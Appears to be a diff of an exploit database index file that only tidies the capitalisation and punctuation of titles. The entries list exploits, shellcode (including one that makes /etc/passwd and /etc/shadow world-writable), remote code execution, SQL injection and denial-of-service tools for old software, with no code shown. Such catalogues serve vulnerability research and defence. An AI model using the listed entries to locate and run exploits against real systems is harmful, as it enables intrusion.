(2)",2000-05-22,Scrippie,linux,local,0 19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0,Slackware 3.x/4.0,Turbolinux 6,OpenLinux 7.0 fdmount Buffer Overflow (3)",2000-05-22,WaR,linux,local,0 19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0,qpopper 2.52/2.53 'EUIDL' Format String Input Vulnerability",2000-05-24,Prizm,linux,local,0 -19956,platforms/cgi/remote/19956.txt,"hp jetadmin 5.5.177/jetadmin 5.6 - Directory Traversal vulnerability",2000-05-24,"Ussr Labs",cgi,remote,8000 +19956,platforms/cgi/remote/19956.txt,"hp jetadmin 5.5.177/jetadmin 5.6 - Directory Traversal Vulnerability",2000-05-24,"Ussr Labs",cgi,remote,8000 19957,platforms/windows/remote/19957.txt,"Pacific Software Carello 1.2.1 File Duplication and Source Disclosure Vulnerability",2000-05-24,"Cerberus Security Team",windows,remote,0 19958,platforms/windows/remote/19958.rb,"Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow",2012-07-20,metasploit,windows,remote,0 19959,platforms/windows/remote/19959.rb,"Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow",2012-07-20,metasploit,windows,remote,998 @@ -17278,7 +17278,7 @@ id,file,description,date,author,platform,type,port 19963,platforms/windows/dos/19963.txt,"PHP 6.0 openssl_verify() Local Buffer Overflow PoC",2012-07-20,"Yakir Wizman",windows,dos,0 19964,platforms/php/webapps/19964.txt,"PHP-Nuke module(SPChat) SQL Injection Vulnerability",2012-07-20,"Yakir Wizman",php,webapps,0 19965,platforms/multiple/remote/19965.txt,"HP JetAdmin 6.0 Printing DoS Vulnerability",2000-05-24,"Ussr Labs",multiple,remote,0 -19966,platforms/linux/remote/19966.c,"Marty Bochane MDBMS 0.9 xbx Buffer Overflow Vulnerability",2000-05-24,"HaCk-13 TeaM",linux,remote,0 +19966,platforms/linux/remote/19966.c,"Marty Bochane MDBms 0.9 xbx Buffer Overflow Vulnerability",2000-05-24,"HaCk-13 TeaM",linux,remote,0 19967,platforms/multiple/local/19967.txt,"Omnis Studio 2.4 Weak Database Field Encryption Vulnerability",2000-05-25,Eric.Stevens,multiple,local,0 19968,platforms/windows/local/19968.c,"Windows 2000/95/98/NT 4.0 Long Filename Extension Vulnerability",2000-04-21,"Laurent Eschenauer",windows,local,0 19969,platforms/linux/local/19969.c,"Mandriva Linux Mandrake 7.0 - Buffer Overflow Vulnerability",2000-05-29,noir,linux,local,0 @@ -17291,15 +17291,15 @@ id,file,description,date,author,platform,type,port 19976,platforms/windows/remote/19976.txt,"Concatus IMate Web Mail Server 2.5 - Buffer Overflow Vulnerability",2000-06-01,"Delphis Consulting",windows,remote,0 19977,platforms/multiple/dos/19977.txt,"Real Networks Real Server 7.0/7.0.1/8.0 Beta View-Source DoS Vulnerability",2000-06-01,"Ussr Labs",multiple,dos,0 19978,platforms/linux/remote/19978.pl,"Atrus Trivalie Productions Simple Network Time Sync 1.0 daemon Buffer Overflow",2000-06-01,"Ben Taylor",linux,remote,0 -19979,platforms/linux/local/19979.pl,"KDE 1.1.2 KApplication configfile vulnerability (1)",2000-05-31,kil3r,linux,local,0 -19980,platforms/linux/local/19980.pl,"KDE 1.1.2 KApplication configfile vulnerability (2)",2000-05-31,kil3r,linux,local,0 -19981,platforms/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile vulnerability (3)",2000-05-31,IhaQueR,linux,local,0 -19982,platforms/bsd/dos/19982.c,"FreeBSD 3.x/4.0/5.0,NetBSD 1.4.1/1.4.2,OpenBSD 2.x Denial of Service",2000-06-01,"Ussr Labs",bsd,dos,0 +19979,platforms/linux/local/19979.pl,"KDE 1.1.2 KApplication configfile Vulnerability (1)",2000-05-31,kil3r,linux,local,0 +19980,platforms/linux/local/19980.pl,"KDE 1.1.2 KApplication configfile Vulnerability (2)",2000-05-31,kil3r,linux,local,0 +19981,platforms/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile Vulnerability (3)",2000-05-31,IhaQueR,linux,local,0 +19982,platforms/bsd/dos/19982.c,"FreeBSD 3.x/4.0/5.0,NetBSD 1.4.1/1.4.2,OpenBSD 2.x - Denial of Service",2000-06-01,"Ussr Labs",bsd,dos,0 19983,platforms/linux/remote/19983.c,"NetWin DMail 2.7/2.8 ETRN Buffer Overflow Vulnerability",2000-06-01,noir,linux,remote,0 19984,platforms/multiple/dos/19984.c,"Eterm 0.8.10,rxvt 2.6.1,PuTTY 0.48,X11R6 3.3.3/4.0 - Denial of Service",2000-05-31,"Kit Knox",multiple,dos,0 19985,platforms/php/webapps/19985.txt,"NetArt Media iBoutique 4.0 (index.php key parameter) SQL Injection Vulnerability",2012-07-20,"SecPod Research",php,webapps,0 19986,platforms/windows/dos/19986.txt,"Oxide Webserver 2.0.4 - Denial of Service Vulnerability",2012-07-20,"SecPod Research",windows,dos,0 -19987,platforms/linux/dos/19987.py,"ptunnel <= 0.72 Remote Denial of Service",2012-07-20,st3n,linux,dos,0 +19987,platforms/linux/dos/19987.py,"ptunnel <= 0.72 - Remote Denial of Service",2012-07-20,st3n,linux,dos,0 19988,platforms/windows/dos/19988.pl,"httpdx 1.5.4 - Remote HTTP Server Denial of Service",2012-07-20,st3n,windows,dos,0 19989,platforms/windows/local/19989.c,"PassWD 1.2 Weak Encryption Vulnerability",2000-06-04,"Daniel Roethlisberger",windows,local,0 19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 man /tmp symlink Vulnerability",2000-06-02,"Jason Axley",hp-ux,local,0 @@ -17310,18 +17310,18 @@ id,file,description,date,author,platform,type,port 19995,platforms/cgi/remote/19995.txt,"Michael Lamont Savant WebServer 2.1 CGI Source Code Disclosure",2000-06-05,Drew,cgi,remote,0 19996,platforms/multiple/dos/19996.txt,"ColdFusion Server 2.0/3.x/4.x Administrator Login Password DoS Vulnerability",2000-06-07,"Stuart McClure",multiple,dos,0 19997,platforms/windows/remote/19997.java,"Etype Eserv 2.9.2 Logging Buffer Overflow Vulnerability",2000-05-10,Wizdumb,windows,remote,0 -19998,platforms/linux/remote/19998.c,"ISC innd 2.x Remote Buffer Overflow Vulnerability",2000-06-12,"Michal Zalewski",linux,remote,0 +19998,platforms/linux/remote/19998.c,"ISC innd 2.x - Remote Buffer Overflow Vulnerability",2000-06-12,"Michal Zalewski",linux,remote,0 19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 BRUEXECLOG Environment Variable Vulnerability",2000-06-05,"Riley Hassell",multiple,local,0 20000,platforms/linux/local/20000.c,"kernel 2.2.x/2.4 .0-test1,SGI ProPack 1.2/1.3 Capabilities Vulnerability (1)",2000-06-07,"Florian Heinz",linux,local,0 20001,platforms/linux/local/20001.sh,"kernel 2.2.x/2.4 .0-test1,SGI ProPack 1.2/1.3 Capabilities Vulnerability (2)",2000-06-07,"Wojciech Purczynski",linux,local,0 20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0 20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0 20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 restore Buffer Overflow Vulnerability",2000-06-07,"Stan Bubrouski",linux,local,0 -20005,platforms/windows/remote/20005.c,"Windows NT 4.0 - Remote Registry Request Dos Vulnerability (1)",2000-06-08,"Renaud Deraison",windows,remote,0 -20006,platforms/windows/remote/20006.nasl,"Windows NT 4.0 - Remote Registry Request Dos Vulnerability (2)",2000-06-08,"Renaud Deraison",windows,remote,0 +20005,platforms/windows/remote/20005.c,"Windows NT 4.0 - Remote Registry Request DoS Vulnerability (1)",2000-06-08,"Renaud Deraison",windows,remote,0 +20006,platforms/windows/remote/20006.nasl,"Windows NT 4.0 - Remote Registry Request DoS Vulnerability (2)",2000-06-08,"Renaud Deraison",windows,remote,0 20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0 20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0 -20009,platforms/linux/remote/20009.py,"atmail email server appliance 6.4 - Stored XSS - csrf - rce",2012-07-21,muts,linux,remote,0 +20009,platforms/linux/remote/20009.py,"atmail email server appliance 6.4 - Stored XSS - CSRF - rce",2012-07-21,muts,linux,remote,0 20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0 20011,platforms/windows/webapps/20011.js,"solarwinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 20012,platforms/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1 .13 Weak Encryption Vulnerability",2000-06-07,Phate.net,windows,local,0 @@ -17332,7 +17332,7 @@ id,file,description,date,author,platform,type,port 20017,platforms/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 Buffer Overflow",2000-06-16,"Ussr Labs",windows,dos,0 20018,platforms/solaris/local/20018.txt,"Veritas Software Volume Manager 3.0.2/3.0.3/3.0.4 File Permission Vulnerability",2000-06-16,"Dixie Flatline",solaris,local,0 20019,platforms/windows/remote/20019.txt,"Cart32 3.0 ""expdate"" Administrative Information Disclosure Vulnerability",2000-05-03,cassius,windows,remote,0 -20020,platforms/windows/dos/20020.txt,"Alt-N MDaemon 2.8.5 0 UIDL DoS Vulnerability",2000-06-16,Craig,windows,dos,0 +20020,platforms/windows/dos/20020.txt,"Alt-N MDaemon 2.8.5 - UIDL DoS Vulnerability",2000-06-16,Craig,windows,dos,0 20021,platforms/linux/local/20021.txt,"RedHat 6.2 Piranha Virtual Server Package Plaintext Password Vulnerability",2000-06-09,arkth,linux,local,0 20022,platforms/windows/local/20022.txt,"HM Software S to Infinity 3.0 - Multiple Vulnerabilities",2000-06-15,Synapt1c,windows,local,0 20023,platforms/linux/dos/20023.c,"Gnome 1.0/1.1,Group X 11.0,XFree86 X11R6 3.3.x/4.0 - Denial of Service",2000-06-19,"Chris Evans",linux,dos,0 @@ -17346,7 +17346,7 @@ id,file,description,date,author,platform,type,port 20031,platforms/linux/remote/20031.c,"wu-ftpd 2.4.2/2.5 .0/2.6 .0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0 20032,platforms/lin_x86/remote/20032.txt,"wu-ftpd 2.4.2/2.5 .0/2.6 .0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0 20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0 -20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Stored XSS - blind sqli - rce",2012-07-22,muts,asp,webapps,0 +20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Stored XSS - blind SQLi - rce",2012-07-22,muts,asp,webapps,0 20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow Exploit",2012-07-23,mr.pr0n,windows,local,0 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0 @@ -17363,7 +17363,7 @@ id,file,description,date,author,platform,type,port 20049,platforms/windows/remote/20049.txt,"Check Point Software Firewall-1 4.0/1.4.1 Resource Exhaustion Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0 20050,platforms/hardware/dos/20050.c,"Check Point Software Firewall-1 3.0/1.4.0/1.4.1 Spoofed Source Denial of Service",2000-07-05,lore,hardware,dos,0 20051,platforms/windows/dos/20051.c,"Sybergen SyGate 2.0/3.11 Denial of Service Vulnerability",2000-06-30,"Marc of eEye",windows,dos,0 -20052,platforms/multiple/dos/20052.txt,"Centrinity FirstClass 5.77 0 Intranet Server Long Header Denial of Service Vulnerability",2000-06-27,"Adam Prime",multiple,dos,0 +20052,platforms/multiple/dos/20052.txt,"Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service Vulnerability",2000-06-27,"Adam Prime",multiple,dos,0 20053,platforms/windows/local/20053.py,"MyMp3 Player Stack .m3u DEP Bypass Exploit",2012-07-23,"Daniel Romero",windows,local,0 20054,platforms/windows/dos/20054.pl,"West Street Software LocalWEB HTTP Server 1.2 - Buffer Overflow",2000-07-04,"Ussr Labs",windows,dos,0 20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0 @@ -17371,16 +17371,16 @@ id,file,description,date,author,platform,type,port 20058,platforms/unix/local/20058.pl,"Visible Systems Razor 4.1 Password File Vulnerability (2)",2000-06-15,"Shawn A. Clifford",unix,local,0 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 Internal Variable Override Vulnerability",2000-07-04,"Adrian Daminato",cgi,remote,0 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 ""/INVITE"" Format String Vulnerability",2000-07-05,RaiSe,linux,remote,0 -20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 Remote Buffer Overflow Vulnerability",2000-07-02,UNYUN,linux,remote,0 +20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow Vulnerability",2000-07-02,UNYUN,linux,remote,0 20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0 20063,platforms/windows/webapps/20063.txt,"Spiceworks 5.3.75941 - Stored XSS and Post-Auth SQL Injection",2012-07-23,dookie,windows,webapps,0 20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit",2012-07-24,muts,linux,remote,0 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 File Existence Disclosure Vulnerability",2000-07-08,"Andrew Lewis",windows,remote,0 20066,platforms/windows/remote/20066.java,"Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow Vulnerability",2000-07-03,Wizdumb,windows,remote,0 20067,platforms/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 Forged TCP RST Vulnerability",2000-07-10,"Citec Network Securities",hardware,remote,0 -20068,platforms/cgi/remote/20068.txt,"Sean MacGuire Big Brother 1.x Directory Traversal Vulnerability",2000-07-11,"Eric Hines",cgi,remote,0 +20068,platforms/cgi/remote/20068.txt,"Sean MacGuire Big Brother 1.x - Directory Traversal Vulnerability",2000-07-11,"Eric Hines",cgi,remote,0 20069,platforms/windows/dos/20069.pl,"Texas Imperial Software WFTPD 2.4.1 RNTO Denial of Service Vulnerability",2000-07-11,"Blue Panda",windows,dos,0 -20070,platforms/windows/remote/20070.txt,"alt-n worldclient standard 2.1 - Directory Traversal vulnerability",2000-07-12,"Rikard Carlsson",windows,remote,0 +20070,platforms/windows/remote/20070.txt,"alt-n worldclient standard 2.1 - Directory Traversal Vulnerability",2000-07-12,"Rikard Carlsson",windows,remote,0 20071,platforms/cgi/dos/20071.c,"Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a Remote DoS Attack Vulnerability",2000-03-10,"Charles Chear",cgi,dos,0 20072,platforms/novell/dos/20072.txt,"Novell Netware 5.0 SP5/6.0 SP1 SMDR.NLM Denial of Service Vulnerability",2000-07-11,"Dimuthu Parussalla",novell,dos,0 20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 insecure perl ""open"" Vulnerability",2000-07-12,"Joey Hess",unix,local,0 @@ -17392,11 +17392,11 @@ id,file,description,date,author,platform,type,port 20079,platforms/windows/remote/20079.txt,"Microsoft Outlook 97/98/2000, Outlook Express 4.0/5.0 GMT Field Buffer Overflow (2)",2000-07-18,"Ussr Labs",windows,remote,0 20080,platforms/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 DoS Vulnerability",2000-07-18,wildcoyote,windows,dos,0 20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 Weak Encryption Method Vulnerability",2000-07-18,"Brian Carrier",windows,local,0 -20082,platforms/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 Remote File Read Vulnerability",2000-07-14,mandark,unix,remote,0 +20082,platforms/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 - Remote File Read Vulnerability",2000-07-14,mandark,unix,remote,0 20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 - Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 Piped Command Vulnerability",2000-07-18,Prizm,cgi,remote,0 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0 -20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 and Earlier Session Extractor 0day",2012-07-24,muts,php,webapps,0 +20087,platforms/php/webapps/20087.py,"Zabbix <= 2.0.1 - Session Extractor (0day)",2012-07-24,muts,php,webapps,0 20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0 20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability",2000-07-17,"Zuo Lei",windows,remote,0 20090,platforms/hardware/remote/20090.txt,"HP JetDirect J3111A Invalid FTP Command DoS Vulnerability",2000-07-19,"Peter Grundl",hardware,remote,0 @@ -17412,7 +17412,7 @@ id,file,description,date,author,platform,type,port 20100,platforms/windows/dos/20100.pl,"WFTPD 2.4.1RC11 STAT/LIST Command DoS",2000-07-21,"Blue Panda",windows,dos,0 20101,platforms/windows/dos/20101.pl,"WFTPD 2.4.1RC11 REST Command Malformed File Write DoS",2000-07-21,"Blue Panda",windows,dos,0 20102,platforms/windows/dos/20102.pl,"WFTPD 2.4.1RC11 Unauthenticated MLST Command Remote DoS",2000-07-21,"Blue Panda",windows,dos,0 -20103,platforms/windows/remote/20103.txt,"analogx simpleserver:www 1.0.6 - Directory Traversal vulnerability",2000-07-26,"Foundstone Inc.",windows,remote,0 +20103,platforms/windows/remote/20103.txt,"analogx simpleserver:www 1.0.6 - Directory Traversal Vulnerability",2000-07-26,"Foundstone Inc.",windows,remote,0 20104,platforms/multiple/remote/20104.txt,"Roxen WebServer 2.0 .X %00 Request File/Directory Disclosure Vulnerability",2000-07-21,zorgon,multiple,remote,0 20105,platforms/linux/remote/20105.txt,"Conectiva 4.x/5.x,RedHat 6.x pam_console Remote User Vulnerability",2000-07-27,bkw1a,linux,remote,0 20106,platforms/windows/remote/20106.cpp,"Microsoft Windows NT 4/2000 NetBIOS Name Conflict Vulnerability",2000-08-01,"Sir Dystic",windows,remote,0 @@ -17424,9 +17424,9 @@ id,file,description,date,author,platform,type,port 20113,platforms/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",2012-07-27,metasploit,linux,remote,0 20116,platforms/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 Buffer Overflow (ASLR and DEP Bypass)",2012-07-27,"Ptrace Security",windows,local,0 20120,platforms/windows/remote/20120.pl,"httpdx <= 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0 -20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 Remote Code Execution",2012-07-31,metasploit,windows,remote,8082 +20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution",2012-07-31,metasploit,windows,remote,8082 20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 (deptUploads_data.php groupid parameter) Blind SQLi",2012-07-30,Kc57,php,webapps,0 -20124,platforms/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 XSS Vulnerability",2012-07-31,"Oliver Karow",windows,webapps,0 +20124,platforms/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 - XSS Vulnerability",2012-07-31,"Oliver Karow",windows,webapps,0 20125,platforms/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",windows,remote,0 20126,platforms/irix/local/20126.c,"IRIX 6.5.x gr_osview Buffer Overflow Vulnerability",1997-01-01,"Last Stage of Delirium",irix,local,0 20127,platforms/irix/local/20127.c,"SGI IRIX 6.2 libgl.so Buffer Overflow Vulnerability",1997-09-01,"Last Stage of Delirium",irix,local,0 @@ -17437,7 +17437,7 @@ id,file,description,date,author,platform,type,port 20132,platforms/multiple/remote/20132.txt,"Tomcat 3.0/3.1 Snoop Servlet Information Disclosure Vulnerability",2000-07-20,"ET LoWNOISE",multiple,remote,0 20133,platforms/windows/local/20133.cpp,"Microsoft Windows 2000 Named Pipes Predictability Vulnerability",2000-08-01,Maceo,windows,local,0 20134,platforms/windows/remote/20134.pl,"NAI Net Tools PKI Server 1.0 strong.exe Buffer Overflow Vulnerability",2000-08-02,juliano,windows,remote,0 -20135,platforms/windows/remote/20135.txt,"nai net tools pki server 1.0 - Directory Traversal vulnerability",2000-08-02,"Juliano Rizzo",windows,remote,0 +20135,platforms/windows/remote/20135.txt,"nai net tools pki server 1.0 - Directory Traversal Vulnerability",2000-08-02,"Juliano Rizzo",windows,remote,0 20136,platforms/windows/remote/20136.txt,"NAI Net Tools PKI Server 1.0 Format String Vulnerability",2000-08-02,"Juliano Rizzo",windows,remote,0 20137,platforms/irix/local/20137.c,"IRIX 6.2/6.3/6.4 xfs truncate() Privilege Check Vulnerability",1997-02-01,"Last Stage of Delirium",irix,local,0 20138,platforms/irix/local/20138.c,"IRIX 5.3/6.x mail Vulnerability",1997-09-01,"Last Stage of Delirium",irix,local,0 @@ -17448,7 +17448,7 @@ id,file,description,date,author,platform,type,port 20143,platforms/linux/remote/20143.txt,"Luca Deri ntop 1.2 a7-9 Unauthorized File Retrieval Vulnerability",2000-08-02,dubhe,linux,remote,0 20144,platforms/solaris/remote/20144.txt,"Sun AnswerBook2 1.4.2/1.4.3/1.4.4 Administration Interface Access",2000-08-08,"Lluis Mora",solaris,remote,0 20145,platforms/linux/remote/20145.c,"Aptis Software TotalBill 3.0 - Remote Command Execution Vulnerability",2000-08-08,"Brian Masney",linux,remote,0 -20146,platforms/solaris/remote/20146.txt,"Solaris AnswerBook2 Remote Command Execution Vulnerability",2000-08-07,"Lluis Mora",solaris,remote,0 +20146,platforms/solaris/remote/20146.txt,"Solaris AnswerBook2 - Remote Command Execution Vulnerability",2000-08-07,"Lluis Mora",solaris,remote,0 20147,platforms/solaris/local/20147.sh,"Tech-Source Raptor GFX PGX32 2.3.1 Config Tool Vulnerability",2000-08-02,suid,solaris,local,0 20148,platforms/windows/remote/20148.pl,"MediaHouse Software Statistics Server LiveStats 5.2 - Buffer Overflow Vulnerability",2000-08-10,Zan,windows,remote,0 20149,platforms/irix/remote/20149.c,"IRIX 5.2/5.3/6.x telnetd Environment Variable Format String Vulnerability",2000-07-01,"Last Stage of Delirium",irix,remote,0 @@ -17458,7 +17458,7 @@ id,file,description,date,author,platform,type,port 20153,platforms/unix/local/20153.c,"David Bagley xlock 4.16 User Supplied Format String Vulnerability (1)",2000-08-15,noir,unix,local,0 20154,platforms/unix/local/20154.c,"David Bagley xlock 4.16 User Supplied Format String Vulnerability (2)",2000-10-21,"Ben Williams",unix,local,0 20155,platforms/linux/local/20155.txt,"Multisoft FlagShip 4.4 Installation Permission Vulnerability",2000-08-10,Narrow,linux,local,0 -20156,platforms/cgi/remote/20156.txt,"netwin netauth 4.2 - Directory Traversal vulnerability",2000-08-17,"Marc Maiffret",cgi,remote,0 +20156,platforms/cgi/remote/20156.txt,"netwin netauth 4.2 - Directory Traversal Vulnerability",2000-08-17,"Marc Maiffret",cgi,remote,0 20157,platforms/linux/remote/20157.c,"UMN Gopherd 2.x Halidate Function Buffer Overflow Vulnerability",2000-08-20,"Chris Sharp",linux,remote,0 20158,platforms/php/webapps/20158.txt,"PHP-Nuke 1.0/2.5 Administrative Privileges Vulnerability",2000-08-21,bruj0,php,webapps,0 20159,platforms/linux/remote/20159.c,"Darxite 0.4 Login Buffer Overflow Vulnerability",2000-08-22,Scrippie,linux,remote,0 @@ -17489,12 +17489,12 @@ id,file,description,date,author,platform,type,port 20185,platforms/linux/local/20185.c,"RedHat 6 glibc/locale Subsystem Format String",2000-09-06,warning3,linux,local,0 20186,platforms/solaris/local/20186.c,"Solaris 2.6/7.0 /locale Subsystem Format String",2000-11-02,warning3,solaris,local,0 20187,platforms/immunix/local/20187.c,"Immunix OS 6.2 LC glibc format string",2000-09-04,"Kil3r of Lam3rZ",immunix,local,0 -20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 ""eject"" exploit for locale subsystem format string",2000-09-08,warning3,solaris,local,0 -20189,platforms/unix/local/20189.c,"Libc locale exploit (1)",2000-09-04,Synnergy.net,unix,local,0 -20190,platforms/unix/local/20190.c,"Libc locale exploit (2)",2000-09-04,anonymous,unix,local,0 +20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 ""eject"" Exploit for locale subsystem format string",2000-09-08,warning3,solaris,local,0 +20189,platforms/unix/local/20189.c,"Libc locale Exploit (1)",2000-09-04,Synnergy.net,unix,local,0 +20190,platforms/unix/local/20190.c,"Libc locale Exploit (2)",2000-09-04,anonymous,unix,local,0 20191,platforms/bsd/local/20191.c,"Juergen Weigert screen 3.9 User Supplied Format String Vulnerability",2000-09-05,IhaQueR@IRCnet,bsd,local,0 20192,platforms/unix/local/20192.txt,"LPPlus 3.2.2/3.3 Permissions DoS Vulnerabilities",2000-09-06,"Dixie Flatline",unix,local,0 -20193,platforms/unix/local/20193.txt,"LPPlus 3.2.2/3.3 dccscan unprivileged read vulnerability",2000-09-06,"Dixie Flatline",unix,local,0 +20193,platforms/unix/local/20193.txt,"LPPlus 3.2.2/3.3 dccscan unprivileged read Vulnerability",2000-09-06,"Dixie Flatline",unix,local,0 20194,platforms/cgi/remote/20194.pl,"CGI Script Center Auction Weaver 1.0.2 - Remote Command Execution Vulnerability",2000-08-30,teleh0r,cgi,remote,0 20195,platforms/lin_x86/shellcode/20195.c,"Linux x86 ASLR deactivation - 83 bytes",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 20196,platforms/lin_x86/shellcode/20196.c,"Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 @@ -17507,7 +17507,7 @@ id,file,description,date,author,platform,type,port 20205,platforms/unix/remote/20205.rb,"Zenoss 3 - showDaemonXMLConfig Command Execution",2012-08-03,metasploit,unix,remote,8080 20206,platforms/multiple/remote/20206.txt,"QSSL Voyager 2.0 1B Arbitrary File Access",2000-09-01,neonbunny,multiple,remote,0 20207,platforms/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B .photon Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote,0 -20208,platforms/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal vulnerability",2000-09-07,pestilence,php,webapps,0 +20208,platforms/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal Vulnerability",2000-09-07,pestilence,php,webapps,0 20209,platforms/windows/local/20209.cpp,"Microsoft Windows 2000 Still Image Service Privilege Escalation Vulnerability",2000-09-06,dildog,windows,local,0 20210,platforms/linux/remote/20210.txt,"Apache 1.3.12 WebDAV Directory Listings Vulnerability",2000-09-07,Mnemonix,linux,remote,0 20211,platforms/windows/remote/20211.c,"Mobius DocumentDirect for the Internet 1.2 - Buffer Overflow Vulnerabilities",2000-09-08,wildcoyote,windows,remote,0 @@ -17532,7 +17532,7 @@ id,file,description,date,author,platform,type,port 20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x SMTP Content Filtering Evasion Vulnerability",2000-09-19,"Lincoln Yeoh",hardware,remote,0 20232,platforms/windows/local/20232.cpp,"Microsoft Windows 2000/NT 4 - DLL Search Path Weakness",2000-09-18,"Georgi Guninski",windows,local,0 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 DoS Vulnerability",2000-09-21,"Delphis Consulting",windows,dos,0 -20234,platforms/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal vulnerability",2000-09-21,anon,multiple,remote,8002 +20234,platforms/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal Vulnerability",2000-09-21,anon,multiple,remote,8002 20235,platforms/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 Buffer Overflow Vulnerability",2000-09-21,blackangels,windows,remote,0 20236,platforms/linux/remote/20236.txt,"S.u.S.E. Linux 6.3/6.4 Installed Package Disclosure Vulnerability",2000-09-21,t0maszek,linux,remote,0 20237,platforms/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 ""From:"" Field Buffer Overflow Vulnerability",2000-09-23,Arkane,linux,remote,0 @@ -17562,21 +17562,21 @@ id,file,description,date,author,platform,type,port 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow ASLR bypass",2012-08-05,pole,windows,local,0 